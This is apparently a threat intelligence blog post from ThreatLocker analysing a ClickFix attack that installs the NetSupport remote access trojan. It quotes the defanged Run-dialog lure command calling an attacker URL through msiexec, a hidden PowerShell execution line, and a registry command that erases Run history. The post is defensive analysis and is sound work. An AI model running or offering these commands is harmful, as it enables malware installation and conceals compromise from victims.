Table of contents
ThreatLocker Threat Intelligence previously detailed how ClickFix social engineering attacks have become a popular attack vector for malicious actors. Usually, under the guise of additional verification steps, the victim is instructed to open the Windows Run Dialog box, copy, paste, and execute a malicious command.
Whitespace or innocuous filler might disguise the command, but its purpose doesn’t change: it reaches out to an attacker-controlled server and pulls down a malicious payload.
The malicious payload often contains a persistence mechanism to grant attackers access to the environment remotely and at will. ThreatLocker Threat Intelligence recently observed a ClickFix attack chain that delivers the NetSupport RAT "client32.exe", a once-legitimate remote management tool repurposed as a remote access trojan that still bears its original certificate.
Incident Overview
Here’s what makes the NetSupport remote access trojan observed Nov. 20 unique among other RATs: it used to be the NetSupport Manager, a legitimate remote access tool. Malicious actors repurposed the management tool into a remote access trojan that is still signed with a valid certificate.
This valid certificate enables the NetSupport RAT to innately bypass certificate-based security measures. When delivered via a ClickFix social engineering attack, the installation of the NetSupport RAT may appear to be intentional or even benign activity.
Here’s the good news: ThreatLocker Detect can alert and respond to such activity despite the trojan’s valid certificate.
In the case we observed, the user was prompted to enter the following command into the Run Dialog box:
[ssh.exe -o proxycommand=‘powershell -windowstyle hidden -command msiexec /q /i hxxps[:]\\tinyurl[.]com\uz874hb5’ 🗹 click ok or press enter to recaptcha verification.]
The TinyURL link pasted into the Run Dialog box redirected to “hxxps[:]//approveis[.]info/bVfrH7[.]png”. Despite being named as a harmless “.png” image file, the file contained valid MSI instructions and was executed as such by “msiexec.exe”. By combining three different execution methods, the response from this redirecting URL executed as an MSI package. Analysis of the file showed embedded PowerShell code that executed a command encoded with base64.
Once decoded and executed, the PowerShell command reached out to a malicious server and made a request to a PHP page, the response of which was identified as “u3u3l.ps1”. When the response to this request was downloaded as a file, it was named “fGteN.wav.” Command Prompt executed PowerShell to run this script with the following arguments: cmd.exe /c start powershell /w h -ep bypass -file "C:\ProgramData\u3u3l.ps1".
The "u3u3l.ps1" script contained the main payload with the embedded encoded NetSupport RAT executable, "client32.exe", along with other dependencies and required libraries for the original NetSupport Manager. Significant effort was made to continue the deception, as PowerShell Write-Host commands were used to display misleading messages such as "Installing SecureModule Engine v1.0.0" and "Preparing virtual container..." .
While a misled user waited for their installation to complete, the 14 embedded files for the NetSupport RAT were decoded and dropped to disk. The “[IO.File]::WriteAllBytes()” function was used to drop these files into a newly created folder within the ProgramData directory.
The embedded "client32.exe," once dropped, had a valid certificate and was confirmed to be NetSupport. This certificate remained during the tool’s transition from legitimate platform to highly abused RAT.
Once the trojan dropped the files, it created a new process and pointed to the newly created "client32.exe". It then notified the user that their installation was complete, and a command consistent throughout ClickFix attacks was observed:
Remove-ItemProperty –Path ‘HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU’
-Name * -ErrorAction SilentlyContinue
This command effectively cleared the history of the Windows Run Dialog, which was originally used to start the attack chain. Without this piece of the puzzle, a victim could have significant trouble identifying the original compromise in their environment.
Conclusion
ClickFix-style attacks have become more prominent in recent months, but they only succeed when a potential victim cooperates with them. With the right user training and controls in place, high-breadth tools like the Run Dialog box can be blocked from user access, completely preventing this style of attack. You can also implement policies to capture unique commands, such as deletion of the "RunMRU" registry key or "msiexec.exe" reaching out to the internet, keeping your environment protected from similar multi-stage attacks.
ABOUT THE AUTHOR
Rayton Li, threat specialist at ThreatLocker, combines hands-on technical expertise with a background in enterprise IT and cybersecurity operations. Before joining ThreatLocker, he worked in IT support at KPMG and as an electrician, developing a practical, systems-level understanding of technology. His work centers on threat analysis, physical red teaming, and incident response, disciplines he approaches with precision, curiosity, and a commitment to helping customers stay secure. At ThreatLocker, Rayton focuses on threat hunting and adversary research, turning technical insight into actionable defense.
ABOUT THE AUTHOR
William Pires, threat analyst at ThreatLocker, brings a data-first mindset shaped by hands-on work in MDR and customer-facing threat response. He holds a bachelor’s degree in accounting and spent two years as a credit analyst before moving into cybersecurity, a path that sharpened his rigor, accuracy, and judgment under pressure. He advanced from approval requests to MDR, then to threat analysis, where he pieces together attack paths from confirmed incidents and researches active threats, group profiles, and emerging tactics. At ThreatLocker, William focuses on translating research into clear detections and practical guidance for customers. His recent work spans software communication analysis, incident triage, and providing cutting edge threat intelligence to enterprise environments and the cybersecurity industry.
ABOUT THE AUTHOR
Pandeli Zi, threat analyst at ThreatLocker, brings a lifelong curiosity for how systems work, an instinct that started with taking things apart just to see why they functioned the way they did. That curiosity led him into technology, where early exposure to cybersecurity concepts, data security, and digital risk shaped into a bachelor's degree from UCF. Before joining ThreatLocker, Pandeli built technical depth through a range of IT and asset management roles at organizations including Orlando Health, Florida's Turnpike Enterprise, and Morgan & Morgan. At ThreatLocker, he focuses on daily threat tracking, malware research, and post-incident analysis, translating intelligence into practical insights that strengthen customer defenses.
ABOUT THE AUTHOR
John Moutos, threat intelligence team lead at ThreatLocker, is a cybersecurity specialist with roots in enterprise penetration testing and offensive security research. John studied at the Oregon Institute of Technology and earned his bachelor’s from the SANS Technology Institute. At ThreatLocker, he leads the threat intelligence program, turning research into practical detections and guidance that helps organizations anticipate and counter emerging attacks.
ABOUT THE AUTHOR
Marcus Akamo, threat specialist at ThreatLocker, brings a blend of network operations experience and self-driven cybersecurity study to his work on detection engineering. Before moving into security, he spent nearly two years in a network operations center, where he built a practical understanding of traffic flow and system behavior. That foundation helps him distinguish normal patterns from the subtle anomalies that signal trouble. At ThreatLocker, he focuses on building policies that detect and stop new and emerging attacks, turning real time research into protections that help keep organizations safer
